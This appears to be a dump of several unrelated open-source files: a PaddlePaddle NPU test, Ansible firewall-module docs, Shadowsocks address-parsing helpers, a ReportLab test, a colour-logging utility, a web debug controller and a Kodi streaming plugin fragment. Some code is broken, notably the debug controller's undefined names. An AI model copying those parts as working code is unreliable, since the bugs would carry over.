# TODO(ascendrc): Max grad test
# def test_check_grad(self):
# if self.dtype == np.float16:
# return
# self.check_grad(['X'], 'Out')
#
@unittest.skipIf(not paddle.is_compiled_with_npu(),
"core is not compiled with NPU")
class TestElementwiseMaxFp16(OpTest):
def setUp(self):
self.set_npu()
self.op_type = "elementwise_max"
self.place = paddle.NPUPlace(0)
self.init_dtype()
np.random.seed(SEED)
x = np.random.uniform(1, 2, [3, 4]).astype(self.dtype)
y = np.random.uniform(1, 2, [3, 4]).astype(self.dtype)
out = np.maximum(x, y)
self.inputs = {
'X': OpTest.np_dtype_to_fluid_dtype(x),
'Y': OpTest.np_dtype_to_fluid_dtype(y)
}
self.attrs = {}
self.outputs = {'Out': out}
def set_npu(self):
self.__class__.use_npu = True
self.__class__.no_need_check_grad = True
def init_dtype(self):
self.dtype = np.float16
def test_check_output(self):
self.check_output_with_place(self.place, check_dygraph=False, atol=1e-5)
@unittest.skipIf(not paddle.is_compiled_with_npu(),
"core is not compiled with NPU")
class TestElementwiseMaxNet(unittest.TestCase):
def _test(self, run_npu=True):
main_prog = paddle.static.Program()
startup_prog = paddle.static.Program()
main_prog.random_seed = SEED
startup_prog.random_seed = SEED
np.random.seed(SEED)
a_np = np.random.random(size=(32, 32)).astype('float32')
b_np = np.random.random(size=(32, 32)).astype('float32')
label_np = np.random.randint(2, size=(32, 1)).astype('int64')
with paddle.static.program_guard(main_prog, startup_prog):
a = paddle.static.data(name="a", shape=[32, 32], dtype='float32')
b = paddle.static.data(name="b", shape=[32, 32], dtype='float32')
label = paddle.static.data(
name="label", shape=[32, 1], dtype='int64')
c = paddle.maximum(a, b)
fc_1 = fluid.layers.fc(input=c, size=128)
prediction = fluid.layers.fc(input=fc_1, size=2, act='softmax')
cost = fluid.layers.cross_entropy(input=prediction, label=label)
loss = fluid.layers.reduce_mean(cost)
sgd = fluid.optimizer.SGD(learning_rate=0.01)
sgd.minimize(loss)
if run_npu:
place = paddle.NPUPlace(0)
else:
place = paddle.CPUPlace()
exe = paddle.static.Executor(place)
exe.run(startup_prog)
print("Start run on {}".format(place))
for epoch in range(100):
pred_res, loss_res = exe.run(
main_prog,
feed={"a": a_np,
"b": b_np,
"label": label_np},
fetch_list=[prediction, loss])
if epoch % 10 == 0:
print("Epoch {} | Prediction[0]: {}, Loss: {}".format(
epoch, pred_res[0], loss_res))
return pred_res, loss_res
def test_npu(self):
cpu_pred, cpu_loss = self._test(False)
npu_pred, npu_loss = self._test(True)
self.assertTrue(np.allclose(npu_pred, cpu_pred))
self.assertTrue(np.allclose(npu_loss, cpu_loss))
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
defionscode/ansible-modules-extras
|
windows/win_firewall_rule.py
|
22
|
3333
|
#!/usr/bin/env python
# (c) 2014, Timothy Vandenbrande <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: win_firewall_rule
version_added: "2.0"
author: Timothy Vandenbrande
short_description: Windows firewall automation
description:
- allows you to create/remove/update firewall rules
options:
enable:
description:
- is this firewall rule enabled or disabled
default: null
required: false
choices: ['yes', 'no']
state:
description:
- create/remove/update or powermanage your VM
default: "present"
required: true
choices: ['present', 'absent']
name:
description:
- the rules name
default: null
required: true
direction:
description:
- is this rule for inbound or outbound trafic
default: null
required: true
choices: [ 'In', 'Out' ]
action:
description:
- what to do with the items this rule is for
default: null
required: true
choices: [ 'allow', 'block' ]
description:
description:
- description for the firewall rule
default: null
required: false
localip:
description:
- the local ip address this rule applies to
default: null
required: false
remoteip:
description:
- the remote ip address/range this rule applies to
default: null
required: false
localport:
description:
- the local port this rule applies to
default: null
required: false
remoteport:
description:
- the remote port this rule applies to
default: null
required: false
program:
description:
- the program this rule applies to
default: null
required: false
service:
description:
- the service this rule applies to
default: null
required: false
protocol:
description:
- the protocol this rule applies to
default: null
required: false
profile:
description:
- the profile this rule applies to
default: null
required: false
force:
description:
- Enforces the change if a rule with different values exists
default: false
required: false
'''
EXAMPLES = '''
- name: Firewall rule to allow smtp on TCP port 25
action: win_firewall_rule
args:
name: smtp
enabled: yes
state: present
localport: 25
action: allow
protocol: TCP
'''
|
gpl-3.0
|
LazyClutch/shadowsocks
|
shadowsocks/common.py
|
945
|
8921
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import socket
import struct
import logging
def compat_ord(s):
if type(s) == int:
return s
return _ord(s)
def compat_chr(d):
if bytes == str:
return _chr(d)
return bytes([d])
_ord = ord
_chr = chr
ord = compat_ord
chr = compat_chr
def to_bytes(s):
if bytes != str:
if type(s) == str:
return s.encode('utf-8')
return s
def to_str(s):
if bytes != str:
if type(s) == bytes:
return s.decode('utf-8')
return s
def inet_ntop(family, ipstr):
if family == socket.AF_INET:
return to_bytes(socket.inet_ntoa(ipstr))
elif family == socket.AF_INET6:
import re
v6addr = ':'.join(('%02X%02X' % (ord(i), ord(j))).lstrip('0')
for i, j in zip(ipstr[::2], ipstr[1::2]))
v6addr = re.sub('::+', '::', v6addr, count=1)
return to_bytes(v6addr)
def inet_pton(family, addr):
addr = to_str(addr)
if family == socket.AF_INET:
return socket.inet_aton(addr)
elif family == socket.AF_INET6:
if '.' in addr: # a v4 addr
v4addr = addr[addr.rindex(':') + 1:]
v4addr = socket.inet_aton(v4addr)
v4addr = map(lambda x: ('%02X' % ord(x)), v4addr)
v4addr.insert(2, ':')
newaddr = addr[:addr.rindex(':') + 1] + ''.join(v4addr)
return inet_pton(family, newaddr)
dbyts = [0] * 8 # 8 groups
grps = addr.split(':')
for i, v in enumerate(grps):
if v:
dbyts[i] = int(v, 16)
else:
for j, w in enumerate(grps[::-1]):
if w:
dbyts[7 - j] = int(w, 16)
else:
break
break
return b''.join((chr(i // 256) + chr(i % 256)) for i in dbyts)
else:
raise RuntimeError("What family?")
def is_ip(address):
for family in (socket.AF_INET, socket.AF_INET6):
try:
if type(address) != str:
address = address.decode('utf8')
inet_pton(family, address)
return family
except (TypeError, ValueError, OSError, IOError):
pass
return False
def patch_socket():
if not hasattr(socket, 'inet_pton'):
socket.inet_pton = inet_pton
if not hasattr(socket, 'inet_ntop'):
socket.inet_ntop = inet_ntop
patch_socket()
ADDRTYPE_IPV4 = 1
ADDRTYPE_IPV6 = 4
ADDRTYPE_HOST = 3
def pack_addr(address):
address_str = to_str(address)
for family in (socket.AF_INET, socket.AF_INET6):
try:
r = socket.inet_pton(family, address_str)
if family == socket.AF_INET6:
return b'\x04' + r
else:
return b'\x01' + r
except (TypeError, ValueError, OSError, IOError):
pass
if len(address) > 255:
address = address[:255] # TODO
return b'\x03' + chr(len(address)) + address
def parse_header(data):
addrtype = ord(data[0])
dest_addr = None
dest_port = None
header_length = 0
if addrtype == ADDRTYPE_IPV4:
if len(data) >= 7:
dest_addr = socket.inet_ntoa(data[1:5])
dest_port = struct.unpack('>H', data[5:7])[0]
header_length = 7
else:
logging.warn('header is too short')
elif addrtype == ADDRTYPE_HOST:
if len(data) > 2:
addrlen = ord(data[1])
if len(data) >= 2 + addrlen:
dest_addr = data[2:2 + addrlen]
dest_port = struct.unpack('>H', data[2 + addrlen:4 +
addrlen])[0]
header_length = 4 + addrlen
else:
logging.warn('header is too short')
else:
logging.warn('header is too short')
elif addrtype == ADDRTYPE_IPV6:
if len(data) >= 19:
dest_addr = socket.inet_ntop(socket.AF_INET6, data[1:17])
dest_port = struct.unpack('>H', data[17:19])[0]
header_length = 19
else:
logging.warn('header is too short')
else:
logging.warn('unsupported addrtype %d, maybe wrong password or '
'encryption method' % addrtype)
if dest_addr is None:
return None
return addrtype, to_bytes(dest_addr), dest_port, header_length
class IPNetwork(object):
ADDRLENGTH = {socket.AF_INET: 32, socket.AF_INET6: 128, False: 0}
def __init__(self, addrs):
self._network_list_v4 = []
self._network_list_v6 = []
if type(addrs) == str:
addrs = addrs.split(',')
list(map(self.add_network, addrs))
def add_network(self, addr):
if addr is "":
return
block = addr.split('/')
addr_family = is_ip(block[0])
addr_len = IPNetwork.ADDRLENGTH[addr_family]
if addr_family is socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(block[0]))
elif addr_family is socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, block[0]))
ip = (hi << 64) | lo
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
if len(block) is 1:
prefix_size = 0
while (ip & 1) == 0 and ip is not 0:
ip >>= 1
prefix_size += 1
logging.warn("You did't specify CIDR routing prefix size for %s, "
"implicit treated as %s/%d" % (addr, addr, addr_len))
elif block[1].isdigit() and int(block[1]) <= addr_len:
prefix_size = addr_len - int(block[1])
ip >>= prefix_size
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
if addr_family is socket.AF_INET:
self._network_list_v4.append((ip, prefix_size))
else:
self._network_list_v6.append((ip, prefix_size))
def __contains__(self, addr):
addr_family = is_ip(addr)
if addr_family is socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(addr))
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v4))
elif addr_family is socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, addr))
ip = (hi << 64) | lo
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v6))
else:
return False
def test_inet_conv():
ipv4 = b'8.8.4.4'
b = inet_pton(socket.AF_INET, ipv4)
assert inet_ntop(socket.AF_INET, b) == ipv4
ipv6 = b'2404:6800:4005:805::1011'
b = inet_pton(socket.AF_INET6, ipv6)
assert inet_ntop(socket.AF_INET6, b) == ipv6
def test_parse_header():
assert parse_header(b'\x03\x0ewww.google.com\x00\x50') == \
(3, b'www.google.com', 80, 18)
assert parse_header(b'\x01\x08\x08\x08\x08\x00\x35') == \
(1, b'8.8.8.8', 53, 7)
assert parse_header((b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00'
b'\x00\x10\x11\x00\x50')) == \
(4, b'2404:6800:4005:805::1011', 80, 19)
def test_pack_header():
assert pack_addr(b'8.8.8.8') == b'\x01\x08\x08\x08\x08'
assert pack_addr(b'2404:6800:4005:805::1011') == \
b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00\x00\x10\x11'
assert pack_addr(b'www.google.com') == b'\x03\x0ewww.google.com'
def test_ip_network():
ip_network = IPNetwork('127.0.0.0/24,::ff:1/112,::1,192.168.1.1,192.0.2.0')
assert '127.0.0.1' in ip_network
assert '127.0.1.1' not in ip_network
assert ':ff:ffff' in ip_network
assert '::ffff:1' not in ip_network
assert '::1' in ip_network
assert '::2' not in ip_network
assert '192.168.1.1' in ip_network
assert '192.168.1.2' not in ip_network
assert '192.0.2.1' in ip_network
assert '192.0.3.1' in ip_network # 192.0.2.0 is treated as 192.0.2.0/23
assert 'www.google.com' not in ip_network
if __name__ == '__main__':
test_inet_conv()
test_parse_header()
test_pack_header()
test_ip_network()
|
apache-2.0
|
makinacorpus/reportlab-ecomobile
|
tests/test_platypus_xref.py
|
1
|
5178
|
#Copyright ReportLab Europe Ltd. 2000-2008
#see license.txt for license details
"""Test long documents with indexes, tables and cross-references
"""
__version__='''$Id$'''
from reportlab.lib.testutils import setOutDir,makeSuiteForClasses, outputfile, printLocation
setOutDir(__name__)
import sys, os, time
from string import split, strip, join, whitespace, find
from operator import truth
from types import StringType, ListType
import unittest
from reportlab.lib import colors
from reportlab.lib.units import cm
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.platypus import Paragraph, Flowable, Frame, PageTemplate, BaseDocTemplate
from reportlab.platypus.frames import Frame
from reportlab.lib.randomtext import randomText, PYTHON
from reportlab.platypus.tableofcontents import TableOfContents, SimpleIndex
def myMainPageFrame(canvas, doc):
"The page frame used for all PDF documents."
canvas.saveState()
canvas.setFont('Times-Roman', 12)
pageNumber = canvas.getPageNumber()
canvas.drawString(10*cm, cm, str(pageNumber))
canvas.restoreState()
class MyDocTemplate(BaseDocTemplate):
_invalidInitArgs = ('pageTemplates',)
def __init__(self, filename, **kw):
frame1 = Frame(2.5*cm, 2.5*cm, 16*cm, 25*cm, id='Frame1')
self.allowSplitting = 0
self.showBoundary = 1
apply(BaseDocTemplate.__init__, (self, filename), kw)
template = PageTemplate('normal', [frame1], myMainPageFrame)
self.addPageTemplates(template)
def afterFlowable(self, flowable):
"Registers TOC and Index entries and makes outline entries."
if flowable.__class__.__name__ == 'Paragraph':
styleName = flowable.style.name
if styleName == 'Heading1':
level = 0
text = flowable.getPlainText()
pageNum = self.page
self.notify('TOCEntry', (level, text, pageNum))
# Add PDF outline entries (not really needed/tested here).
key = str(hash(flowable))
c = self.canv
c.bookmarkPage(key)
c.addOutlineEntry(text, key, level=level, closed=0)
# index a bunch of pythonic buzzwords. In real life this
# would be driven by markup.
try:
text = flowable.getPlainText()
except:
return
for phrase in ['uniform','depraved','finger', 'Fraudulin']:
if find(text, phrase) > -1:
self.notify('IndexEntry', (phrase, self.page))
#print 'IndexEntry:',phrase, self.page
def _test0(self):
"This makes one long multi-page paragraph."
from reportlab.platypus.flowables import DocAssign, DocExec, DocPara, DocIf, DocWhile
# Build story.
story = []
styleSheet = getSampleStyleSheet()
h1 = styleSheet['Heading1']
h1.pageBreakBefore = 1
h1.keepWithNext = 1
h1.outlineLevel = 0
h2 = styleSheet['Heading2']
h2.backColor = colors.cyan
h2.keepWithNext = 1
h2.outlineLevel = 1
bt = styleSheet['BodyText']
story.append(Paragraph("""Cross-Referencing Test""", styleSheet["Title"]))
story.append(Paragraph("""
Subsequent pages test cross-references: indexes, tables and individual
cross references. The number in brackets at the end of each paragraph
is its position in the story. (%d)""" % len(story), bt))
story.append(Paragraph("""Table of Contents:""", styleSheet["Title"]))
toc = TableOfContents()
story.append(toc)
chapterNum = 1
for i in range(10):
story.append(Paragraph('Chapter %d: Chapters always starts a new page' % chapterNum, h1))
chapterNum = chapterNum + 1
for j in range(3):
story.append(Paragraph('Heading1 paragraphs should always'
'have a page break before. Heading 2 on the other hand'
'should always have a FRAME break before (%d)' % len(story), bt))
story.append(Paragraph('Heading 2 should always be kept with the next thing (%d)' % len(story), h2))
for j in range(3):
story.append(Paragraph(randomText(theme=PYTHON, sentences=2)+' (%d)' % len(story), bt))
story.append(Paragraph('I should never be at the bottom of a frame (%d)' % len(story), h2))
story.append(Paragraph(randomText(theme=PYTHON, sentences=1)+' (%d)' % len(story), bt))
story.append(Paragraph('The Index which goes at the back', h1))
story.append(SimpleIndex())
doc = MyDocTemplate(outputfile('test_platypus_xref.pdf'))
doc.multiBuild(story)
class BreakingTestCase(unittest.TestCase):
"Test multi-page splitting of paragraphs (eyeball-test)."
def test0(self):
_test0(self)
def makeSuite():
return makeSuiteForClasses(BreakingTestCase)
#noruntests
if __name__ == "__main__":
if 'debug' in sys.argv:
_test1(None)
else:
unittest.TextTestRunner().run(makeSuite())
printLocation()
|
bsd-3-clause
|
yrsegal/OneCommandSublimeSyntax
|
OneCommand/wireutils.py
|
5
|
10449
|
"""
Wire Segal's utility library.
Do whatever with it, I seriously couldn't care less.
Runs 2.6+ onwards.
"""
from __future__ import print_function
import os, json, time, sys, re, traceback, threading
def format(string, **kwargs):
"""
Format strings with **kwargs.
"""
for arg in kwargs:
regex = re.compile(r"\{" + arg + r"\}", re.IGNORECASE)
string = regex.sub(str(kwargs[arg]), string)
for color in ansi_colors.COLORS:
regex = re.compile(r"\{" + color + r"\}", re.IGNORECASE)
string = regex.sub(str(ansi_colors.COLORS[color]), string)
return string
def format_traceback(e, text="Traceback (most recent call last):"):
"""
Format a traceback into a printable string.
"""
if not hasattr(e, "__traceback__"):
if str(e):
return str(type(e).__name__) + ": " + str(e)
return str(type(e).__name__)
trace = traceback.extract_tb(e.__traceback__) # Get the traceback object
error = format("{text}\n", text=text) # Start out with `text`
# Iterate through the traceback and add each iteration to the string
for filename,lineno,function,message in trace:
error += format(" File \"{name}\", line {num}, in {funcname}\n",
name=filename,
num=lineno,
funcname=function)
if message:
error += format(" {data}\n", data=message)
# Add the type and message of the error
error += str(type(e).__name__)
if str(e): error += format(": {description}", description=e)
return error
class Registry:
def __init__(self):
self.events = {}
def on(self, tag, *args):
if tag not in self.events:
self.events[tag] = {}
funcid = -1
for i in self.events[tag]:
funcid = max(funcid, i)
funcid += 1
self.events[tag][funcid] = args
return funcid
def deregister(self, tag, funcid):
if tag in self.events:
if funcid in self.events[tag]:
del self.events[tag][funcid]
return True
return False
def hash(self):
return hash(str(self.events))
def graft(self, reg):
for key in reg.events:
if key not in self.events:
self.events[key] = {}
for oldjob in reg.events[key]:
newjob = -1
for i in self.events[key]:
newjob = max(newjob, i)
newjob += 1
self.events[key][newjob] = reg.events[key][oldjob]
class Config:
"""
A JSON read-only loader that will update automatically from `path`.
"""
def __init__(self, path):
self.path = path
self.lastmodtime = os.path.getctime(path) # get the last modified time of the target file
self.data = json.load(open(path))
def reload(self):
if os.path.getctime(self.path) > self.lastmodtime: # check the last modified time of the target file
self.data = json.load(open(self.path))
self.lastmodtime = os.path.getctime(self.path)
# These are extensions of self.data's methods, except they run self.reload.
def __getitem__(self, y):
self.reload()
return self.data[y]
def __contains__(self, key):
self.reload()
return key in self.data
def get(self, k, d=None):
self.reload()
return self.data.get(k, d)
def date_time_string(timestamp=None):
"""
Return the current date and time formatted for a message header.
"""
monthname = [None,
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
now = time.time()
year, month, day, hh, mm, ss, x, y, z = time.localtime(now)
# Add zeroes to keep the length of the timestamp constant
hh = format("0{hours}", hours=hh) if hh < 10 else str(hh)
mm = format("0{minutes}", minutes=mm) if mm < 10 else str(mm)
ss = format("0{seconds}", seconds=ss) if ss < 10 else str(ss)
day = format("0{day}", day=day) if day < 10 else str(day)
s = format("{magenta}[{dd}/{mon}/{yyyy} {hh}:{mm}:{ss}]{endc} ",
dd = day,
mon = monthname[month],
yyyy = year,
hh = hh,
mm = mm,
ss = ss)
return s
def supports_color():
"""
Returns True if the running system's terminal supports color, and False
otherwise.
"""
plat = sys.platform
supported_platform = plat != 'Pocket PC' and (plat != 'win32' or
'ANSICON' in os.environ)
# isatty is not always implemented, #6223.
is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
if not supported_platform or not is_a_tty:
return False
return True
color_supported = supports_color()
if color_supported:
class ansi_colors: # All color codes
"""
A helper class containing colors (for pretty printing.)
"""
BLACK = '\033[30m'
DARKRED = '\033[31m'
DARKGREEN = '\033[32m'
DARKYELLOW = '\033[33m'
DARKBLUE = '\033[34m'
PURPLE = '\033[35m'
DARKCYAN = '\033[36m'
GRAY = '\033[37m'
DARKGRAY = '\033[90m'
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
MAGENTA = '\033[95m'
CYAN = '\033[96m'
WHITE = '\033[97m'
ORANGE = '\033[38;5;202m'
DARKPURPLE = '\033[38;5;53m'
BROWN = '\033[38;5;94m'
PEACH = '\033[38;5;208m'
GOLDEN = '\033[38;5;166m'
BOLD = '\033[1m'
LINE = '\033[4m'
REMAKELINE = '\033[F\033[K'
ENDC = '\033[0m'
COLORS = {
"black": BLACK,
"darkred": DARKRED,
"darkgreen": DARKGREEN,
"darkyellow": DARKYELLOW,
"darkblue": DARKBLUE,
"purple": PURPLE,
"darkcyan": DARKCYAN,
"gray": GRAY,
"darkgray": DARKGRAY,
"red": RED,
"green": GREEN,
"yellow": YELLOW,
"blue": BLUE,
"magenta": MAGENTA,
"cyan": CYAN,
"white": WHITE,
"orange": ORANGE,
"darkpurple": DARKPURPLE,
"brown": BROWN,
"peach": PEACH,
"golden": GOLDEN,
"bold": BOLD,
"line": LINE,
"remakeline": REMAKELINE,
"endc": ENDC
}
else:
class ansi_colors: # No color codes
"""
A helper class containing no colors, allowing systems that don't support ANSI to continue running without strange logs.
"""
BLACK = ''
DARKRED = ''
DARKGREEN = ''
DARKYELLOW = ''
DARKBLUE = ''
PURPLE = ''
DARKCYAN = ''
GRAY = ''
DARKGRAY = ''
RED = ''
GREEN = ''
YELLOW = ''
BLUE = ''
MAGENTA = ''
CYAN = ''
WHITE = ''
ORANGE = ''
DARKPURPLE = ''
BROWN = ''
PEACH = ''
GOLDEN = ''
BOLD = ''
LINE = ''
REMAKELINE = ''
ENDC = ''
COLORS = {
"black": BLACK,
"darkred": DARKRED,
"darkgreen": DARKGREEN,
"darkyellow": DARKYELLOW,
"darkblue": DARKBLUE,
"purple": PURPLE,
"darkcyan": DARKCYAN,
"gray": GRAY,
"darkgray": DARKGRAY,
"red": RED,
"green": GREEN,
"yellow": YELLOW,
"blue": BLUE,
"magenta": MAGENTA,
"cyan": CYAN,
"white": WHITE,
"orange": ORANGE,
"darkpurple": DARKPURPLE,
"brown": BROWN,
"peach": PEACH,
"golden": GOLDEN,
"bold": BOLD,
"line": LINE,
"remakeline": REMAKELINE,
"endc": ENDC
}
def rainbonify(string):
if not color_supported: return string
else:
colors = [ansi_colors.RED, ansi_colors.ORANGE, ansi_colors.YELLOW, ansi_colors.GREEN,
ansi_colors.BLUE, ansi_colors.PURPLE, ansi_colors.DARKPURPLE]
nstring = ""
cind = 0
for i in string:
nstring += colors[cind] + i
cind += 1
cind %= len(colors)
return nstring + ansi_colors.ENDC
class color_config:
"""
An object used to configure color_print and color_input.
"""
def __init__(self):
self.color = ansi_colors.WHITE
self.name = "Generic"
def tag(self):
"""
Return the tag for pretty printing from the config.
"""
return format("{color}[{name}] {endc}",
color=self.color,
name=self.name)
def whitespace(self):
"""
Return the whitespace for non-printed lines.
"""
return " "*(26+len(self.name))
color_printing_config = color_config() # create the instance of color_config used to configure color_print and color_input
lastprinted = None
print_lock = threading.Lock()
def color_print(text, color="", strip=False, func=print, add_newline=False, colorconfig = None, **kwargs):
"""
Pretty print `text`, with `color` as its color, using `func`.
If `strip`, then remove whitespace from both sides of each line.
"""
global lastprinted, print_lock
timestamp = date_time_string()
print_lock.acquire()
if not colorconfig:
colorconfig = color_printing_config
if "whitespace" not in kwargs:
kwargs["whitespace"] = colorconfig.whitespace()
kwargs["color"] = color
text = format(str(text), **kwargs)
# Make sure not to print the same thing twice
if text == lastprinted:
if not color_supported:
print_lock.release()
return
print(ansi_colors.REMAKELINE, end="")
lastprinted = text
# Split the text by lines
if strip:
prints = [i.strip() for i in text.split("\n")]
else:
prints = text.split("\n")
originstr = colorconfig.tag()
func(format("{timestamp}{processtag}{color}{text}{endc}",
timestamp = timestamp,
processtag = originstr,
color = color,
text = prints[0])) # Print the first line with a timestamp
if add_newline: func("\n")
for i in prints[1:]:
func(format("{whitespace}{color}{text}{endc}",
whitespace = colorconfig.whitespace(),
color = color,
text = i)) # Print all consecutive lines
if add_newline: func("\n")
print_lock.release()
try:
agnostic_input = raw_input
except:
agnostic_input = input
def color_input(text, color="", strip=False, func=agnostic_input, colorconfig = None, **kwargs):
"""
Pretty print `text`, with `color` as its color. Take input using `func` on the last line.
If `strip`, then remove whitespace from both sides of each line.
"""
global print_lock
timestamp = date_time_string()
print_lock.acquire()
if not colorconfig:
colorconfig = color_printing_config
if "whitespace" not in kwargs:
kwargs["whitespace"] = colorconfig.whitespace()
kwargs["color"] = color
text = format(str(text), **kwargs)
# Split the text by lines
if strip:
prints = [i.strip() for i in text.split("\n")]
prints[-1] += " " # Add a spacing to the last line
else:
prints = text.split("\n")
originstr = colorconfig.tag()
# Print in order if there's more than one line
if len(prints) > 1:
print(format("{timestamp}{processtag}{color}{text}",
timestamp = timestamp,
processtag = originstr,
color = color,
text = prints[0]))
for i in prints[1:-1]:
print(format("{whitespace}{color}{text}",
whitespace = colorconfig.whitespace(),
color = color,
text = i))
inp = func(format("{whitespace}{color}{text}{endc}",
whitespace = colorconfig.whitespace(),
color = color,
text = prints[-1]))
print_lock.release()
return inp
else:
inp = func(format("{timestamp}{processtag}{color}{text}{endc}",
timestamp = timestamp,
processtag = originstr,
color = color,
text = prints[0]))
print_lock.release()
return inp
|
mit
|
nikcub/Sketch
|
sketch/debug.py
|
1
|
3142
|
import sketch
class CookieTest(sketch.AdminController):
def get(self, arg):
if arg == "/set":
self.redirect('/cookie?set')
if arg == "/clear":
session.invalidate()
self.redirect('/cookie')
else:
if self.session.is_new():
self.session["test"] = 1
else:
self.session["test"] += 1
self.render('cookie', {
'cookie': self.request.str_cookies,
'session': self.session,
'test': self.session["test"],
'sid': self.session.get_sid(),
})
class SketchSession(sketch.AdminController):
def get(self, action):
if action == "template":
return self.render('template', {})
if action == "sessionDestroy":
self.session.invalidate()
return self.redirect('/_session')
if action == "sessionCreate":
self.session['test'] = "test"
self.session.save()
return self.redirect('/_session')
if action == "sessionAddTest":
self.session['var1'] = "this is var one"
self.session['var2'] = {"this": "var two"}
self.session['var3'] = ['this', 'is', 'var3']
self.session['auth'] = True
self.session.save()
return self.redirect('/_session')
if action == "session":
pass
class Handler(sketch.AdminController):
template_folder = 'sketch.admin'
def get(self, action):
if action == "stash":
# from vendor import stash
pass
if action == "session":
action = self.request.get('action')
if action == "create":
self.session['init'] = "initialized"
return self.redirect_back()
if action == "destroy":
self.session.destroy()
return self.redirect_back()
if action == "del":
del self.session['test']
del self.session['beta']
return self.redirect_back()
if action == "add":
self.session['test'] = "test string"
self.session['beta'] = "beta string"
return self.redirect_back()
if action == "regen":
self.session.regen()
return self.redirect_back()
sts = stash.increment()
content = self.render_admin('session', {
'stash': sts,
'session': self.session,
'cookie': os.environ.get('HTTP_COOKIE', ''),
})
return content
if action == "modified":
self.response.headers['Last-Modified'] = "zAmsdwsdsd"
return self.render_admin('modified', {
'req': self.request.headers,
'res': self.response.headers,
})
if action == "etag":
etag_set = self.request.get('etag', False)
if etag_set:
self.response.headers['ETag'] = etag_set
# return self.redirect('/_etag')
return self.render_admin('etag', {
'req': self.request.headers,
'res': self.response.headers,
})
if action == "globals":
glob = sketch._sketch_globals
return self.render_admin('globals', {
'globals': glob,
})
if action == "env":
return self.render_sketch('env', {
'debug': self.debug,
'is_dev': self.is_dev,
'env': self.env,
'enviro': self.enviro,
})
|
bsd-2-clause
|
guymakam/Kodi-Israel
|
plugin.video.israelive/resources/lib/myFilmon.py
|
1
|
11283
|
import re, random, time
import urllib, urllib2, json
import common
AddonID = "plugin.video.israelive"
def GetUrlStream(url, filmonOldStrerams=False, useRtmp=False):
chNum, referrerCh, ChName, filmonMethod = GetUrlParams(url)
if filmonMethod is not None:
filmonOldStrerams = (filmonMethod == 0)
return GetChannelStream(chNum, referrerCh, ChName, filmonOldStrerams, useRtmp)
def GetChannelStream(chNum, referrerCh=None, ChName=None, filmonOldStrerams=False, useRtmp=False):
if referrerCh == None:
prms = GetChannelJson(chNum, filmonOldStrerams)
else:
prms = GetChannelJson(referrerCh, filmonOldStrerams)
if prms == None:
print '--------- Playing Error: there is no channel with id="{0}" ---------'.format(chNum)
return None,None,None,None
channelName, channelDescription, iconimage, streamUrl, tvGuide = GetChannelDetails(prms, chNum, referrerCh, ChName, filmonOldStrerams, useRtmp)
#print '--------- Playing: ch="{0}", name="{1}" ----------'.format(chNum, channelName)
#return streamUrl, channelName, programmeName, iconimage #, image
return streamUrl, channelName, iconimage, tvGuide
def GetChannelGuide(chNum, filmonOldStrerams=False):
prms = GetChannelJson(chNum, filmonOldStrerams)
if prms == None:
return None,None,None,None
channelName, channelDescription, iconimage, streamUrl, tvGuide = GetChannelDetails(prms, chNum, filmonOldStrerams=filmonOldStrerams)
return channelName, channelDescription, iconimage, tvGuide
def MakeChannelGuide(prms):
tvGuide = []
server_time = int(prms["server_time"]) if prms.has_key("server_time") else int(time.time())
programmename = ""
description = ""
startdatetime = 0
enddatetime = 0
if prms.has_key("tvguide") and len(prms["tvguide"]) > 1:
tvguide = prms["tvguide"]
for prm in tvguide:
startdatetime = int(prm["startdatetime"])
enddatetime = int(prm["enddatetime"])
if server_time > enddatetime:
continue
description = prm["programme_description"]
programmename = prm["programme_name"]
image = None if not prm.has_key("images") or len(prm["images"]) == 0 or not prm["images"][0].has_key("url") else prm["images"][0]["url"]
tvGuide.append({"start": startdatetime, "end": enddatetime, "name": programmename.encode('utf-8'), "description": description.encode('utf-8'), "image": image})
elif prms.has_key("now_playing") and len(prms["now_playing"]) > 0:
now_playing = prms["now_playing"]
startdatetime = int(now_playing["startdatetime"])
enddatetime = int(now_playing["enddatetime"])
if startdatetime < server_time and server_time < enddatetime:
description = now_playing["programme_description"]
programmename = now_playing["programme_name"]
image = None if not now_playing.has_key("images") or len(now_playing["images"]) == 0 or not now_playing["images"][0].has_key("url") else now_playing["images"][0]["url"]
tvGuide.append({"start": startdatetime, "end": enddatetime, "name": programmename.encode('utf-8'), "description": description.encode('utf-8'), "image": image})
